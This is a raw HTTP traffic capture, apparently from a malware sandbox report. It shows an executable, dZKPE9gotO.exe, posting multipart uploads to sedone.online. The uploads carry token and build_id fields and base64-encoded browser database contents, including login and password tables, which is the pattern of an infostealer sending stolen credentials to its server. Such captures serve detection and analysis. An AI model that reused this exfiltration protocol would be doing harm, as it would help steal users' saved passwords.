                                                                                                                                                                                                                                                2024-12-16 14:40:10 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                23192.168.2.749846162.159.61.34435088C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:09 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                2024-12-16 14:40:09 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                24192.168.2.749850116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:10 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----K6FKFCT00ZU3E37900RQ
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 68733
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:10 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 36 46 4b 46 43 54 30 30 5a 55 33 45 33 37 39 30 30 52 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 46 4b 46 43 54 30 30 5a 55 33 45 33 37 39 30 30 52 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 46 4b 46 43 54 30 30 5a 55 33 45 33 37 39 30 30 52 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------K6FKFCT00ZU3E37900RQContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------K6FKFCT00ZU3E37900RQContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------K6FKFCT00ZU3E37900RQCont
                                                                                                                                                                                                                                                2024-12-16 14:40:10 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:10 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                2024-12-16 14:40:10 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:10 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                2024-12-16 14:40:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:11 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:12 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                25192.168.2.749874116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:12 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----V37900RQQ9RQIEU37QQQ
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 262605
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:12 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 56 33 37 39 30 30 52 51 51 39 52 51 49 45 55 33 37 51 51 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 56 33 37 39 30 30 52 51 51 39 52 51 49 45 55 33 37 51 51 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 56 33 37 39 30 30 52 51 51 39 52 51 49 45 55 33 37 51 51 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------V37900RQQ9RQIEU37QQQContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------V37900RQQ9RQIEU37QQQContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------V37900RQQ9RQIEU37QQQCont
                                                                                                                                                                                                                                                2024-12-16 14:40:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:12 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                2024-12-16 14:40:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
